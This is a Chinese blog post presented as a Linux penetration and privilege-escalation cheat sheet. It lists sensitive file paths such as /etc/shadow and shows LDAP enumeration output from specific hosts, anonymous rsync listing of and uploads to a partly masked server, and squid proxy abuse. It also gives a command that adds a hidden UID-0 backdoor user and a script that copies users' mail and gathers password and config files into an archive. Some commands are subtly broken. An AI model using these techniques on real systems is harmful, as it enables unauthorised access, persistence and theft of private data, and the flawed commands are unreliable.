zoukankan      html  css  js  c++  java

  • LINUX渗透与提权总结

    本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。

    Linux 系统下的一些常见路径:

    001 /etc/passwd
    002  
    003 /etc/shadow
    004  
    005 /etc/fstab
    006  
    007 /etc/host.conf
    008  
    009 /etc/motd
    010  
    011 /etc/ld.so.conf
    012  
    013 /var/www/htdocs/index.php
    014  
    015 /var/www/conf/httpd.conf
    016  
    017 /var/www/htdocs/index.html
    018  
    019 /var/httpd/conf/php.ini
    020  
    021 /var/httpd/htdocs/index.php
    022  
    023 /var/httpd/conf/httpd.conf
    024  
    025 /var/httpd/htdocs/index.html
    026  
    027 /var/httpd/conf/php.ini
    028  
    029 /var/www/index.html
    030  
    031 /var/www/index.php
    032  
    033 /opt/www/conf/httpd.conf
    034  
    035 /opt/www/htdocs/index.php
    036  
    037 /opt/www/htdocs/index.html
    038  
    039 /usr/local/apache/htdocs/index.html
    040  
    041 /usr/local/apache/htdocs/index.php
    042  
    043 /usr/local/apache2/htdocs/index.html
    044  
    045 /usr/local/apache2/htdocs/index.php
    046  
    047 /usr/local/httpd2.2/htdocs/index.php
    048  
    049 /usr/local/httpd2.2/htdocs/index.html
    050  
    051 /tmp/apache/htdocs/index.html
    052  
    053 /tmp/apache/htdocs/index.php
    054  
    055 /etc/httpd/htdocs/index.php
    056  
    057 /etc/httpd/conf/httpd.conf
    058  
    059 /etc/httpd/htdocs/index.html
    060  
    061 /www/php/php.ini
    062  
    063 /www/php4/php.ini
    064  
    065 /www/php5/php.ini
    066  
    067 /www/conf/httpd.conf
    068  
    069 /www/htdocs/index.php
    070  
    071 /www/htdocs/index.html
    072  
    073 /usr/local/httpd/conf/httpd.conf
    074  
    075 /apache/apache/conf/httpd.conf
    076  
    077 /apache/apache2/conf/httpd.conf
    078  
    079 /etc/apache/apache.conf
    080  
    081 /etc/apache2/apache.conf
    082  
    083 /etc/apache/httpd.conf
    084  
    085 /etc/apache2/httpd.conf
    086  
    087 /etc/apache2/vhosts.d/00_default_vhost.conf
    088  
    089 /etc/apache2/sites-available/default
    090  
    091 /etc/phpmyadmin/config.inc.php
    092  
    093 /etc/mysql/my.cnf
    094  
    095 /etc/httpd/conf.d/php.conf
    096  
    097 /etc/httpd/conf.d/httpd.conf
    098  
    099 /etc/httpd/logs/error_log
    100  
    101 /etc/httpd/logs/error.log
    102  
    103 /etc/httpd/logs/access_log
    104  
    105 /etc/httpd/logs/access.log
    106  
    107 /home/apache/conf/httpd.conf
    108  
    109 /home/apache2/conf/httpd.conf
    110  
    111 /var/log/apache/error_log
    112  
    113 /var/log/apache/error.log
    114  
    115 /var/log/apache/access_log
    116  
    117 /var/log/apache/access.log
    118  
    119 /var/log/apache2/error_log
    120  
    121 /var/log/apache2/error.log
    122  
    123 /var/log/apache2/access_log
    124  
    125 /var/log/apache2/access.log
    126  
    127 /var/www/logs/error_log
    128  
    129 /var/www/logs/error.log
    130  
    131 /var/www/logs/access_log
    132  
    133 /var/www/logs/access.log
    134  
    135 /usr/local/apache/logs/error_log
    136  
    137 /usr/local/apache/logs/error.log
    138  
    139 /usr/local/apache/logs/access_log
    140  
    141 /usr/local/apache/logs/access.log
    142  
    143 /var/log/error_log
    144  
    145 /var/log/error.log
    146  
    147 /var/log/access_log
    148  
    149 /var/log/access.log
    150  
    151 /usr/local/apache/logs/access_logaccess_log.old
    152  
    153 /usr/local/apache/logs/error_logerror_log.old
    154  
    155 /etc/php.ini
    156  
    157 /bin/php.ini
    158  
    159 /etc/init.d/httpd
    160  
    161 /etc/init.d/mysql
    162  
    163 /etc/httpd/php.ini
    164  
    165 /usr/lib/php.ini
    166  
    167 /usr/lib/php/php.ini
    168  
    169 /usr/local/etc/php.ini
    170  
    171 /usr/local/lib/php.ini
    172  
    173 /usr/local/php/lib/php.ini
    174  
    175 /usr/local/php4/lib/php.ini
    176  
    177 /usr/local/php4/php.ini
    178  
    179 /usr/local/php4/lib/php.ini
    180  
    181 /usr/local/php5/lib/php.ini
    182  
    183 /usr/local/php5/etc/php.ini
    184  
    185 /usr/local/php5/php5.ini
    186  
    187 /usr/local/apache/conf/php.ini
    188  
    189 /usr/local/apache/conf/httpd.conf
    190  
    191 /usr/local/apache2/conf/httpd.conf
    192  
    193 /usr/local/apache2/conf/php.ini
    194  
    195 /etc/php4.4/fcgi/php.ini
    196  
    197 /etc/php4/apache/php.ini
    198  
    199 /etc/php4/apache2/php.ini
    200  
    201 /etc/php5/apache/php.ini
    202  
    203 /etc/php5/apache2/php.ini
    204  
    205 /etc/php/php.ini
    206  
    207 /etc/php/php4/php.ini
    208  
    209 /etc/php/apache/php.ini
    210  
    211 /etc/php/apache2/php.ini
    212  
    213 /web/conf/php.ini
    214  
    215 /usr/local/Zend/etc/php.ini
    216  
    217 /opt/xampp/etc/php.ini
    218  
    219 /var/local/www/conf/php.ini
    220  
    221 /var/local/www/conf/httpd.conf
    222  
    223 /etc/php/cgi/php.ini
    224  
    225 /etc/php4/cgi/php.ini
    226  
    227 /etc/php5/cgi/php.ini
    228  
    229 /php5/php.ini
    230  
    231 /php4/php.ini
    232  
    233 /php/php.ini
    234  
    235 /PHP/php.ini
    236  
    237 /apache/php/php.ini
    238  
    239 /xampp/apache/bin/php.ini
    240  
    241 /xampp/apache/conf/httpd.conf
    242  
    243 /NetServer/bin/stable/apache/php.ini
    244  
    245 /home2/bin/stable/apache/php.ini
    246  
    247 /home/bin/stable/apache/php.ini
    248  
    249 /var/log/mysql/mysql-bin.log
    250  
    251 /var/log/mysql.log
    252  
    253 /var/log/mysqlderror.log
    254  
    255 /var/log/mysql/mysql.log
    256  
    257 /var/log/mysql/mysql-slow.log
    258  
    259 /var/mysql.log
    260  
    261 /var/lib/mysql/my.cnf
    262  
    263 /usr/local/mysql/my.cnf
    264  
    265 /usr/local/mysql/bin/mysql
    266  
    267 /etc/mysql/my.cnf
    268  
    269 /etc/my.cnf
    270  
    271 /usr/local/cpanel/logs
    272  
    273 /usr/local/cpanel/logs/stats_log
    274  
    275 /usr/local/cpanel/logs/access_log
    276  
    277 /usr/local/cpanel/logs/error_log
    278  
    279 /usr/local/cpanel/logs/license_log
    280  
    281 /usr/local/cpanel/logs/login_log
    282  
    283 /usr/local/cpanel/logs/stats_log
    284  
    285 /usr/local/share/examples/php4/php.ini
    286  
    287 /usr/local/share/examples/php/php.ini
    288  
    289 /usr/local/tomcat5527/bin/version.sh
    290  
    291 /usr/share/tomcat6/bin/startup.sh
    292  
    293 /usr/tomcat6/bin/startup.sh

     liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:

    1 1.cat /etc/nsswitch

    看看密码登录策略我们可以看到使用了file ldap模式

    1 2.less /etc/ldap.conf
    2  
    3 base ou=People,dc=unix-center,dc=net

    找到ou,dc,dc设置

    3.查找管理员信息

    匿名方式

    1 ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    有密码形式

    1 ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    4.查找10条用户记录

    1 ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

    实战:

    1 1.cat /etc/nsswitch

    看看密码登录策略我们可以看到使用了file ldap模式

    1 2.less /etc/ldap.conf
    2  
    3 base ou=People,dc=unix-center,dc=net

    找到ou,dc,dc设置

    3.查找管理员信息

    匿名方式

    1 ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    有密码形式

    1 ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    4.查找10条用户记录

    1 ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

    渗透实战:

    1.返回所有的属性

    01 ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
    02  
    03 version: 1
    04  
    05 dn: dc=ruc,dc=edu,dc=cn
    06  
    07 dc: ruc
    08  
    09 objectClass: domain
    10  
    11 dn: uid=manager,dc=ruc,dc=edu,dc=cn
    12  
    13 uid: manager
    14  
    15 objectClass: inetOrgPerson
    16  
    17 objectClass: organizationalPerson
    18  
    19 objectClass: person
    20  
    21 objectClass: top
    22  
    23 sn: manager
    24  
    25 cn: manager
    26  
    27 dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
    28  
    29 uid: superadmin
    30  
    31 objectClass: inetOrgPerson
    32  
    33 objectClass: organizationalPerson
    34  
    35 objectClass: person
    36  
    37 objectClass: top
    38  
    39 sn: superadmin
    40  
    41 cn: superadmin
    42  
    43 dn: uid=admin,dc=ruc,dc=edu,dc=cn
    44  
    45 uid: admin
    46  
    47 objectClass: inetOrgPerson
    48  
    49 objectClass: organizationalPerson
    50  
    51 objectClass: person
    52  
    53 objectClass: top
    54  
    55 sn: admin
    56  
    57 cn: admin
    58  
    59 dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
    60  
    61 uid: dcp_anonymous
    62  
    63 objectClass: top
    64  
    65 objectClass: person
    66  
    67 objectClass: organizationalPerson
    68  
    69 objectClass: inetOrgPerson
    70  
    71 sn: dcp_anonymous
    72  
    73 cn: dcp_anonymous 
    2.查看基类
    1 bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

    3.查找

    001 bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
    002  
    003 version: 1
    004  
    005 dn:
    006  
    007 objectClass: top
    008  
    009 namingContexts: dc=ruc,dc=edu,dc=cn
    010  
    011 supportedExtension: 2.16.840.1.113730.3.5.7
    012  
    013 supportedExtension: 2.16.840.1.113730.3.5.8
    014  
    015 supportedExtension: 1.3.6.1.4.1.4203.1.11.1
    016  
    017 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
    018  
    019 supportedExtension: 2.16.840.1.113730.3.5.3
    020  
    021 supportedExtension: 2.16.840.1.113730.3.5.5
    022  
    023 supportedExtension: 2.16.840.1.113730.3.5.6
    024  
    025 supportedExtension: 2.16.840.1.113730.3.5.4
    026  
    027 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
    028  
    029 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
    030  
    031 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
    032  
    033 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
    034  
    035 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
    036  
    037 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
    038  
    039 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
    040  
    041 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
    042  
    043 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
    044  
    045 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
    046  
    047 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
    048  
    049 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
    050  
    051 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
    052  
    053 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
    054  
    055 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
    056  
    057 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
    058  
    059 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
    060  
    061 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
    062  
    063 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
    064  
    065 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
    066  
    067 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
    068  
    069 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
    070  
    071 supportedExtension: 1.3.6.1.4.1.1466.20037
    072  
    073 supportedExtension: 1.3.6.1.4.1.4203.1.11.3
    074  
    075 supportedControl: 2.16.840.1.113730.3.4.2
    076  
    077 supportedControl: 2.16.840.1.113730.3.4.3
    078  
    079 supportedControl: 2.16.840.1.113730.3.4.4
    080  
    081 supportedControl: 2.16.840.1.113730.3.4.5
    082  
    083 supportedControl: 1.2.840.113556.1.4.473
    084  
    085 supportedControl: 2.16.840.1.113730.3.4.9
    086  
    087 supportedControl: 2.16.840.1.113730.3.4.16
    088  
    089 supportedControl: 2.16.840.1.113730.3.4.15
    090  
    091 supportedControl: 2.16.840.1.113730.3.4.17
    092  
    093 supportedControl: 2.16.840.1.113730.3.4.19
    094  
    095 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
    096  
    097 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
    098  
    099 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
    100  
    101 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
    102  
    103 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
    104  
    105 supportedControl: 2.16.840.1.113730.3.4.14
    106  
    107 supportedControl: 1.3.6.1.4.1.1466.29539.12
    108  
    109 supportedControl: 2.16.840.1.113730.3.4.12
    110  
    111 supportedControl: 2.16.840.1.113730.3.4.18
    112  
    113 supportedControl: 2.16.840.1.113730.3.4.13
    114  
    115 supportedSASLMechanisms: EXTERNAL
    116  
    117 supportedSASLMechanisms: DIGEST-MD5
    118  
    119 supportedLDAPVersion: 2
    120  
    121 supportedLDAPVersion: 3
    122  
    123 vendorName: Sun Microsystems, Inc.
    124  
    125 vendorVersion: Sun-Java(tm)-System-Directory/6.2
    126  
    127 dataversion: 020090516011411
    128  
    129 netscapemdsuffix: cn=ldap://dc=webA:389
    130  
    131 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
    132  
    133 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
    134  
    135 supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
    136  
    137 supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
    138  
    139 supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
    140  
    141 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
    142  
    143 supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
    144  
    145 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
    146  
    147 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
    148  
    149 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
    150  
    151 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
    152  
    153 supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
    154  
    155 supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
    156  
    157 supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
    158  
    159 supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
    160  
    161 supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
    162  
    163 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
    164  
    165 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
    166  
    167 supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
    168  
    169 supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
    170  
    171 supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
    172  
    173 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
    174  
    175 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
    176  
    177 supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    178  
    179 supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
    180  
    181 supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
    182  
    183 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
    184  
    185 supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
    186  
    187 supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
    188  
    189 supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
    190  
    191 supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
    192  
    193 supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
    194  
    195 supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
    196  
    197 supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
    198  
    199 supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
    200  
    201 supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
    202  
    203 supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
    204  
    205 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
    206  
    207 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
    208  
    209 supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
    210  
    211 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
    212  
    213 supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
    214  
    215 supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
    216  
    217 supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
    218  
    219 supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
    220  
    221 supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
    222  
    223 supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
    224  
    225 supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
    226  
    227 supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5 
     

     liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:

    列举IP:

    1 showmount -e ip

     liunx 相关提权渗透技巧总结,三、rsync渗透技巧:

    1.查看rsync服务器上的列表:

    01 rsync 210.51.X.X::
    02  
    03 finance
    04  
    05 img_finance
    06  
    07 auto
    08  
    09 img_auto
    10  
    11 html_cms
    12  
    13 img_cms
    14  
    15 ent_cms
    16  
    17 ent_img
    18  
    19 ceshi
    20  
    21 res_img
    22  
    23 res_img_c2
    24  
    25 chip
    26  
    27 chip_c2
    28  
    29 ent_icms
    30  
    31 games
    32  
    33 gamesimg
    34  
    35 media
    36  
    37 mediaimg
    38  
    39 fashion
    40  
    41 res-fashion
    42  
    43 res-fo
    44  
    45 taobao-home
    46  
    47 res-taobao-home
    48  
    49 house
    50  
    51 res-house
    52  
    53 res-home
    54  
    55 res-edu
    56  
    57 res-ent
    58  
    59 res-labs
    60  
    61 res-news
    62  
    63 res-phtv
    64  
    65 res-media
    66  
    67 home
    68  
    69 edu
    70  
    71 news
    72  
    73 res-book

    看相应的下级目录(注意一定要在目录后面添加上/)

    1 rsync 210.51.X.X::htdocs_app/
    2  
    3 rsync 210.51.X.X::auto/
    4  
    5 rsync 210.51.X.X::edu/

    2.下载rsync服务器上的配置文件

    1 rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

    3.向上更新rsync文件(成功上传,不会覆盖)

    1 rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
    2  
    3 http://app.finance.xxx.com/warn/nothack.txt

     liunx 相关提权渗透技巧总结,四、squid渗透技巧:

    1 nc -vv 91ri.org 80
    2  
    3 GET HTTP://www.sina.com / HTTP/1.0
    4  
    5 GET HTTP://WWW.sina.com:22 / HTTP/1.0

     liunx 相关提权渗透技巧总结,五、SSH端口转发:

    1 ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

     liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:

    确定版本:

    1 index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

    重新设置密码:

    1 index.php?option=com_user&view=reset&layout=confirm

     liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:

    1 useradd -o -u 0 nothack

     liunx 相关提权渗透技巧总结,八、freebsd本地提权:

    01 [argp@julius ~]$ uname -rsi
    02  
    03 * freebsd 7.3-RELEASE GENERIC
    04  
    05 * [argp@julius ~]$ sysctl vfs.usermount
    06  
    07 * vfs.usermount: 1
    08  
    09 * [argp@julius ~]$ id
    10  
    11 * uid=1001(argp) gid=1001(argp) groups=1001(argp)
    12  
    13 * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
    14  
    15 * [argp@julius ~]$ ./nfs_mount_ex
    16  
    17 *
    18  
    19 calling nmount()

     tar 文件夹打包:

    1、tar打包:

    1 tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif  排除目录 /xx/xx/*
    2  
    3 alzip打包(韩国) alzip -a D:WEB d:web*.rar

    {

    注:

    关于tar的打包方式,linux不以扩展名来决定文件类型。

    若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压

    那么用这条比较好

    1 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*

    }

    系统信息收集:

    view source
    01 for linux:
    02  
    03 #!/bin/bash
    04  
    05 echo #######geting sysinfo####
    06  
    07 echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
    08  
    09 echo #######basic infomation##
    10  
    11 cat /proc/meminfo
    12  
    13 echo
    14  
    15 cat /proc/cpuinfo
    16  
    17 echo
    18  
    19 rpm -qa 2>/dev/null
    20  
    21 ######stole the mail......######
    22  
    23 cp -a /var/mail /tmp/getmail 2>/dev/null
    24  
    25 echo 'u'r id is' `id`
    26  
    27 echo ###atq&crontab#####
    28  
    29 atq
    30  
    31 crontab -l
    32  
    33 echo #####about var#####
    34  
    35 set
    36  
    37 echo #####about network###
    38  
    39 ####this is then point in pentest,but i am a new bird,so u need to add some in it
    40  
    41 cat /etc/hosts
    42  
    43 hostname
    44  
    45 ipconfig -a
    46  
    47 arp -v
    48  
    49 echo ########user####
    50  
    51 cat /etc/passwd|grep -i sh
    52  
    53 echo ######service####
    54  
    55 chkconfig --list
    56  
    57 for i in {oracle,mysql,tomcat,samba,apache,ftp}
    58  
    59 cat /etc/passwd|grep -i $i
    60  
    61 done
    62  
    63 locate passwd >/tmp/password 2>/dev/null
    64  
    65 sleep 5
    66  
    67 locate password >>/tmp/password 2>/dev/null
    68  
    69 sleep 5
    70  
    71 locate conf >/tmp/sysconfig 2>dev/null
    72  
    73 sleep 5
    74  
    75 locate config >>/tmp/sysconfig 2>/dev/null
    76  
    77 sleep 5
    78  
    79 ###maybe can use "tree /"###
    80  
    81 echo ##packing up#########
    82  
    83 tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
    84  
    85 rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
     
  • 相关阅读:
    如何批量修改文件名
    iphone数据存储之-- Core Data的使用(一)
    ios中@class和 #import,两种方式的讨论
    #import与@class的区别
    第三方Push服务:Urban Airship
    iOS开发如何实现消息推送机制
    cocos2d-x中CCCallFunc CCCallFuncN CCCallFuncND的区别和使用示例
    纯Html+Ajax和JSP两者的优缺点
    什么是Ajax?
    解读前端开发工程师必备技能
  • 原文地址:https://www.cnblogs.com/milantgh/p/3601783.html
Copyright © 2011-2022 走看看